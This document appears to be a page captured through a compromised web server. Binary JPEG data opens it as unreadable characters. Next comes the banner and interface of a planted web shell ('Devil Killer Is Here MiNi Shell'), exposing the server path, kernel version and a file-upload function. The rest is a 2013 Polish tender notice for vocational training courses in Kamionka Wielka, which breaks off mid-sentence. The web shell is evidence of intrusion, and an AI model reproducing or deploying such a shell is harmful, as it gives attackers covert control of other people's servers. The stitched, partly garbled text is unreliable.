JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130612/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130612/226042-N-2013.html

<p class="kh_header"><b>Kamionka Wielka: Usługa zorganizowania i przeprowadzenia  szkoleń z zakresu aktywizacji edukacyjnej dla osób korzystających ze świadczeń pomocy społecznej, w wieku aktywności zawodowej, które są osobami nieaktywnymi zawodowo, bezrobotnymi lub pracującymi - rolnicy - zagrożeni wykluczeniem społecznym</b><br>
<b>Numer ogłoszenia: 226042 - 2013; data zamieszczenia: 12.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej w Kamionce Wielkiej , Kamionka Wielka 5, 33-334 Kamionka Wielka, woj. małopolskie, tel. 18 445 67 20, faks 18 445 67 20.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.kamionka.iap.pl, tel/fax 18 4490763</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa zorganizowania i przeprowadzenia  szkoleń z zakresu aktywizacji edukacyjnej dla osób korzystających ze świadczeń pomocy społecznej, w wieku aktywności zawodowej, które są osobami nieaktywnymi zawodowo, bezrobotnymi lub pracującymi - rolnicy - zagrożeni wykluczeniem społecznym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa zorganizowania i przeprowadzenia szkoleń 
z zakresu aktywizacji edukacyjnej dla osób korzystających ze świadczeń pomocy społecznej, w wieku aktywności zawodowej, które są osobami nieaktywnymi zawodowo, bezrobotnymi lub pracującymi - rolnicy - zagrożeni wykluczeniem społecznym w zakresie: 
1) Florystyki z ozdobnym pakowaniem towaru i obsługą kasy fiskalnej dla 6 osób, 
2) Kucharz małej gastronomi z obsługą kasy fiskalnej dla 7 osób, 
3) Sprzedawca z obsługą programu magazynowo-fakturowego, kasy fiskalnej i  terminala płatniczego dla 7 osób, 
4) Operator koparko-ładowarki kl. III dla 1 osoby, 
5) Prawo jazdy kat. B dla 9 osób, 
6) Kurs prawa jazdy kat. C wraz ze szkoleniem w ramach kwalifikacji wstępnej przyspieszonej dla prawa jazdy kat. C, C+E dla 1 osoby, 
7) Kierowca wózka jezdniowego z wymianą butli gazowej dla 1 osoby
3.4 Zamawiający w niniejszym postępowaniu dopuszcza składanie ofert częściowych na wykonanie zamówienia wg niżej podanego podziału:
Pakiet I: Florystyka z ozdobnym pakowaniem towaru i obsługą kasy fiskalnej, 
Pakiet II: Kucharz małej gastronomi z obsługą kasy fiskalnej, 
Pakiet III: Sprzedawca z obsługą programu magazynowo-fakturowego, kasy fiskalnej i  terminala płatniczego, 
Pakiet IV: Operator koparko-ładowarki kl. III, 
Pakiet V: Prawo jazdy kat. B, 
Pakiet VI: Kurs prawa jazdy kat. C wraz ze szkoleniem w ramach kwalifikacji wstępnej przyspieszonej dla prawa jazdy kat. C, C+E, 
Pakiet VII: Kierowca wózka jezdniowego z wymianą butli gazowej
Szkolenia realizowane będą przez Ośrodek Pomocy Społecznej w Kamionce Wielkiej, w ramach Programu Operacyjnego Kapitał Ludzki Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwości udzielenia zamówień uzupełniających o których mowa w  art. 67 ust. 1 pkt. 6 ustawy Prawo zamówień publicznych dla pakietów: I, II, III i V.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.31.00-0, 80.41.12.00-0, 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 50.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Z uwagi na wartość przedmiotu zamówienia Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania warunków udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych - oświadczenie to stanowi załącznik nr 3 do SIWZ. Zamawiający żąda zgodnie z art. 20 ust. 1 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy - tekst jednolity: Dz. U. 2008 r. Nr 69 poz. 415 z późn. zm. oraz Rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 października 2004r. 
w sprawie rejestru instytucji szkoleniowych -Dz. U. Nr 236, poz. 2365-  wpisu Wykonawcy do rejestru instytucji szkoleniowych. Zamawiający dokona sprawdzenia w systemie elektronicznym Syriusz www.ris.praca.gov.pl prowadzonym przez Wojewódzkie Urzędy Pracy czy Wykonawca posiada aktualny na dany rok kalendarzowy wpis do rejestru instytucji szkoleniowych. 
Zamawiający dokona oceny spełnienia warunków określonych wyżej zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych oświadczeniach wymaganych w specyfikacji i danych zawartych w elektronicznym rejestrze instytucji szkoleniowy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania warunków udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych - (oświadczenie to stanowi załącznik nr 3 do SIWZ). Zamawiający dokona oceny spełnienia warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania warunków udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych - (oświadczenie to stanowi załącznik nr 3 do SIWZ). Zamawiający dokona oceny spełnienia warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania warunków udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych - (oświadczenie to stanowi załącznik nr 3 do SIWZ). Zamawiający dokona oceny spełnienia warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania warunków udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych - (oświadczenie to stanowi załącznik nr 3 do SIWZ). Zamawiający dokona oceny spełnienia warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>certyfikat jakości usług ISO</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - certyfikat jakości usług ISO - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa może ulec zmianie w przypadku zmniejszenia liczby uczestników szkolenia 
z przyczyn niezależnych od Zamawiającego i będącego wynikiem:
1) nie podjęcia szkolenia lub rezygnacji kandydata pomimo wcześniejszych deklaracji o uczestnictwie,
2) niestawienia się kandydata na szkoleniu pomimo wezwania  przez Ośrodek Pomocy Społecznej ,
3) przerwania uczestnictwa w szkoleniu (podjęcie pracy, choroba, nieusprawiedliwiona rezygnacja ze szkolenia), którego nie można było przewidzieć w dniu zawarcia umowy,
 Umowa może ulec zmianie w wyniku wystąpienia następujących okoliczności ze strony Wykonawcy: 
1) zmiana kadry realizującej szkolenie w wyniku nieprzewidywalnych zdarzeń losowych (np. choroba, śmierć, rozwiązanie stosunku pracy), których nie można było przewidzieć w dniu zawarcia umowy.
Zamawiający wyliczy do umowy koszt szkolenia jednej osoby brutto jako iloraz całkowitej ceny brutto za szkolenie przez ilość uczestników szkolenia podanych w specyfikacji istotnych warunków zamówienia. W umowie stosownie do postanowień ppkt 1 i 2 zmianie ulega przeliczenie kosztu 
    szkolenia. W takim przypadku koszt szkolenia stanowi iloczyn kosztu szkolenia jednej osoby oraz rzeczywistej ilości osób, które rozpoczęły szkolenie.
W sytuacji, gdy liczba osób szkolonych ulegnie zmniejszeniu w trakcie trwania kursu, Wykonawca może ubiegać się o zwrot kosztów kursu osób, które przerwały kurs. Wynagrodzenie za  szkolenie tych osób stanowi sumę kosztów zrealizowanych osobogodzin przez każdą z tych osób.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kamionka.iap.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.kamionka.iap.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.06.2013 godzina 08:30, miejsce: Ofertę należy złożyć w siedzibie Ośrodka Pomocy Społecznej, Kamionka Wielka 253, 33-334 Kamionka Wielka, pokój nr 3 w terminie do dnia 20.06.2013 r. do godz. 8.30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szkolenia realizowane będą przez Ośrodek Pomocy Społecznej w Kamionce Wielkiej, w ramach Programu Operacyjnego Kapitał Ludzki Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Florystyki z ozdobnym pakowaniem towaru i obsługą kasy fiskalnej dla 6 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia jest nabycie przez kursantów wiedzy i umiejętności praktycznych niezbędnych do podjęcia pracy w zawodzie florysty  oraz nabycie umiejętności obsługi kasy fiskalnej i ozdobnego pakowania towaru. 
Planowany termin rozpoczęcia szkolenia: do 7 dni od  dnia podpisania umowy.
Czas trwania szkolenia (w tym egzamin wewnętrzny) wynosi  do 35 dni roboczych licząc od daty rozpoczęcia szkolenia. Szkolenie powinno składać się z części teoretyczno-zawodowej
i praktycznej.
Liczba godzin zajęć dla każdego uczestnika szkolenia wynosi 130 godziny 
zegarowych zawierających:  
- 60 godziny zajęć teoretyczno-zawodowych w tym:
1)  42 godzin zajęć teoretyczno - zawodowych niezbędnych do pracy na stanowisku  florysty z elementami ozdobnego pakowania towaru - Moduł I                         
2)  18 godzin zajęć z obsługi kasy fiskalnej oraz urządzeń wspomagających system sprzedaży - Moduł II
- 70 godziny zajęć praktycznych w kwiaciarni - Moduł III.
Zamawiający wymaga aby zajęcia szkoleniowe odbywały się wyłącznie w dni robocze (poniedziałek - czwartek). Liczba godzin w dniu - do 6 godz. 
Miejsce odbywania szkolenia: Nowy Sącz.
Zajęcia teoretyczno - zawodowe i praktyczne nie mogą trwać dłużej niż do godz. 16.00..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. certyfikat jakości usług ISO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kucharz małej gastronomi z obsługą kasy fiskalnej dla 7 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia jest nabycie przez uczestników szkolenia podstawowej wiedzy i umiejętności praktycznych niezbędnych w zawodzie kucharza. Ponadto Zamawiający wymaga, aby uczestnicy szkolenia uzyskali podstawowe informacje z zakresu obsługi kasy fiskalnej.
Planowany termin rozpoczęcia szkolenia: do 7 dni od  dnia podpisania umowy.
Czas trwania szkolenia (w tym egzamin wewnętrzny) wynosi do 40 dni robocze licząc od daty rozpoczęcia szkolenia. Szkolenie powinno składać się z części teoretyczno-zawodowej i praktycznej.
Liczba godzin zajęć dla każdego uczestnika szkolenia wynosi nie mniej niż 160 godzin zegarowych zawierających:  
- min. 60 godzin zajęć teoretyczno-zawodowych w tym:
1) min. 48 godzin zajęć teoretyczno - zawodowych niezbędnych do pracy na stanowisku -kucharza - Moduł I,
2) min. 12 godzin zajęć teoretyczno- zawodowych obejmujących podstawowe informacje z zakresu obsługi kasy fiskalnej- Moduł II,
-min. 100  godzin zajęć praktycznych w zakładach gastronomicznych, stołówkach, restauracjach - Moduł III.
Wymaga się aby zajęcia szkoleniowe odbywały się wyłącznie w dni robocze (poniedziałek - czwartek). Liczba godzin w dniu - do 6 godz. 
Miejsce odbywania szkolenia: Nowy Sącz.
Zajęcia teoretyczno - zawodowe nie mogą trwać dłużej niż do godz. 16.00.
Zajęcia praktyczne w zakładach gastronomicznych, stołówkach lub restauracjach nie mogą trwać dłużej niż do godz. 16.00..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. certyfikat jakosci usług ISO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sprzedawca z obsługą programu magazynowo-fakturowego, kasy fiskalnej i  terminala płatniczego dla 6 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia jest nabycie przez uczestników szkolenia wiedzy i umiejętności praktycznych niezbędnych do podjęcia pracy w zawodzie sprzedawcy z odpowiednimi kwalifikacjami zawodowymi. Planowany termin rozpoczęcia szkolenia: do 7 dni od  dnia podpisania umowy.
Czas trwania szkolenia (w tym egzamin wewnętrzny) wynosi nie dłużej niż 50 dni robocze licząc od daty rozpoczęcia szkolenia. 
Moduł I- zajęcia  teoretyczno- warsztatowe związane  z zawodem  sprzedawcy - liczba godzin zajęć dla każdego uczestnika szkolenia wynosi nie mniej niż 60 godzin zegarowych. 
Moduł  II - warsztaty komputerowe z  obsługi  licencjonowanego  programu  fakturowo  -   magazynowego -nie mniej niż 40 godzin zegarowych; 
Moduł  III -  obsługa kasy fiskalnej, urządzeń wspomagających system sprzedaży w tym terminali płatniczych - nie mniej niż 18 godzin zegarowych;  Moduł  IV zajęcia praktyczne w placówkach handlowych - nie mniej niż 70 godzin  zegarowych. 
Wymaga się aby zajęcia szkoleniowe odbywały się wyłącznie w dni robocze (poniedziałek - czwartek). Liczba godzin w dniu - do 6 godz. 
 Miejsce odbywania szkolenia: Nowy Sącz .
Zajęcia teoretyczno - zawodowe nie mogą trwać dłużej niż do godz. 16.00.
Zajęcia praktyczne w nie mogą trwać dłużej niż do godz. 16.00..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 80.53.31.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 50.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. certyfikat jakości usług - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Operator koparko-ładowarki kl. III dla 1 osoby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia jest nabycie przez kursanta wiedzy i umiejętności praktycznych oraz przygotowanie kursanta do zdania egzaminu państwowego przed komisją powołaną przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie aby uzyskać uprawnienia niezbędne do podjęcia pracy w zawodzie operatora koparko-ładowarki kl. III.
 Planowany termin rozpoczęcia szkolenia: do 7 dni od  dnia podpisania umowy.
 Planowany Czas trwania szkolenia ( w tym egzamin) wynosi do 40 dni roboczych licząc od daty rozpoczęcia szkolenia. Szkolenie powinno składać się z części teoretyczno-zawodowej i praktycznej. Egzamin państwowy powinien odbyć się bezpośrednio po zrealizowaniu programu szkolenia.  
 Liczba godzin szkoleniowych dla uczestnika szkolenia wynosi 176 godziny zegarowe  zajęć, w tym:  
- 116 godzin zajęć teoretyczno-zawodowych - Moduł I
-  60 godzin zajęć praktycznych - Moduł II.
Wymaga się aby zajęcia odbywały się wyłącznie w dni robocze (poniedziałek - piątek). Liczba godzin w dniu - do 7 godz. 
Miejsce realizacji szkolenia: Nowy Sącz lub powiat nowosądecki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. certyfikat jakości usług ISO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Prawo jazdy kat. B dla 9 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia jest nabycie przez kursantów umiejętności niezbędnych do kierowania  samochodem  osobowym oraz  rzetelne przygotowanie teoretyczne i praktyczne do zdania egzaminu państwowego. 
Zakres przedmiotowy szkolenia powinien być zrealizowany zgodnie z przepisami zawartymi 
